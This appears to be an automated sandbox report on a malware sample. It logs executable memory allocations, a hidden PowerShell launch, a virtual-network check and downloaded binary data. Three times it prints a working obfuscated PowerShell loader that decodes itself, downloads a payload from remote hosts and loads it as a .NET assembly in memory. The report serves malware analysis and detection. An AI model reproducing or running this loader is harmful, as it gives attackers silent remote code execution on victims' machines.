NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a25000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a26000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a27000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a28000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a2d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a2e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a2f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

cmdline

powershell -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 3, 2025, 2:44 p.m.	show_type: 0 filepath_r: powershell parameters: -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd" filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 3, 2025, 2:44 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 474 events)

Data received
Data received
Data received
Data received	0
Data received	XÁÃ~ªã'-ï òúY*yý_\E¶,hM{íâWLu:?Lõ©¨a
Data received
Data received	éòy)ÁMÅÙ=¬U°5yÔd'äKq)$ô{
Data received	Ð
Data received	Vþì1uwÈP!vO©Á¦´rsTzY>^Z&4÷ôùpz\¸}X¬ù\|Ö§ïvÅJ¨×®6ì{þ4>L¢º\<õQcBHÝ#ü\ì¶T$ /$Òt°ÂXàÑ&(Ã-gÛym¼±uGEiZpÿnò¥'QMêWJ®G^ªµÀâF&ÿRc(¸ÔC³G\üÑ¾"ÚI÷r`F÷ç¼õW7Z±Ð¨²ÅÐt2tß÷WëqùZæm°¥:AèÄ2Ð&k³LAyö¡°e1?¿"é tla¢]t°>º!T¥ìÀÅqTû25]'ZèÍ~¥¯Òeí±·X+yóþêG´ìç5Üqª 6c0Vk\|çÆîãR{öÊ<Ì3ðO\ïNÜîý ªÉlRÊ¬À7åç¦¾y2æ!¤þ¦Ê)Ùk\|ûéßÙHM"ª¶k³å?å¤©idjè$¤ñ#ÿ!z+¹; (dúCòæ¾$~àtª¸ZWzÊy Ù¢ ÉÐ<ª£ø ï=78q_ùEy~J;ÇÛG¥Üft^V¦}Ù óùh2¯2H&ØÇ6¼ÙîO)·ññÓÏWu{êIÌ>hµ'¨ôR´£îL¬ÕPu©Þjy /ËH^æ!qéY(TÚÆdäðuºÜpABC'«f°îëp4P<'iôg/ÑAÇ/<¯ÉX(QûYFHÆõ/k1Ì,ÞUô@4(xBegì¸LzF¬Í_ ³7Ñ%´w· ¾ PºyÂÈ@¿Bhì¼mixq'þ±Ígæp@x)Ê¤¨É¤F[G;XBe&)2ð{AV0[§d¾ûgÒÑX=é?AM´e0/äRÕ{3]Î¢Skïõ¢.ÿz} ï>+4[Ì#Nõ°µÅamU±(BBÄ@¢#ì?Ó.$EJ[Ù Ç §Tzf_ï[Ù1®ñ{¦¾¤ë9L8FÎBÂ°q´}LyÄ'ÓF¹UÈ6mkVnKÏó²¹OéE£ÛÉ°f¨Ê2ê¥®7 :Â«êmr5Ë¼"³K;¨ÃcÇkúA£³å½(Í«-È Ê ëàùTÕrfïDU´NS4@LÏ%«.jOáo½¼¥ñT¿7'C´î¿.gµg¢ùdð¤Së¬:qÅ§{.<à@SG«#VNúÓÉ£ÛùB ÖÅsÒx¢Èhû±µøÐÿo[óÙÛ¡a_;>!2dcÆkì^&]\¸Ó:}+#Ï63¦E1P1<K¬¤¥â>¦`²`W9Ê÷P!¦ØwÇ^áåáÊ÷:î~í_&ÏZÉ©UvUo&½Ò+«ÔB°»¬ZÍLAßö«òjìL²#Ï/vºÃp4&. g=TVàf.KvýB¸ìz[Üu~ÖÍPjfÃNLd!Vj!ÍóáÀxL^¸t×S\Ï°ÇScf4ÁñÈ NéLU@0Bv 1äl®æwðïísÑæ2i¤g8áX ø¥¼\hDQ³ÕV°Ê£Â«L7ZÈ#hÊ%^oW?Emßð->lA_½³sê+#_'i~§¹æâ£ÅBÓ¦HþêèfÒXà×uµÔgdÀ?íig[é«$àGøÍ¤Mr¬A¿.FhÙÏ~¥Õ+ÞÕ²q ¥ KÅ±[\ÿ»HyÀ[( ÁòJK@jÚ`¼cBËLé+Ý¯µ'a7¢na»nÍZ»¢Ó½(£®ûùØiÔòjcâ¯³?ùRÇÁ¯O5Hm®S®Âp´wÈPìµò¨6 wFgeF2ØjÜ» Çm»-þ¢¼HB³è{£^bHÉ¥10Ì['o¥#¥OFÉ¶7åPJÁ:Ü Ø}YX¡?i\|PÄk&CÍA/\| pF<]ÈÐôöE°Eo«'3¢ÛWá¶õ¹x?±¹ïB´9p Áyaô?S¥s59Ìñ ± «4Ýuoù´3DÚ[éÜ&>nÀBªîî:¹û¥øe-ôùúwkXLñ,ËM>· ^"£3âËÒ2Ýv+ço`7R@»Júß-6bõ!W-¼¼ßÒ ÷4IG£µ\|ÜEU¦44N jûÌ+j WÛç,»é 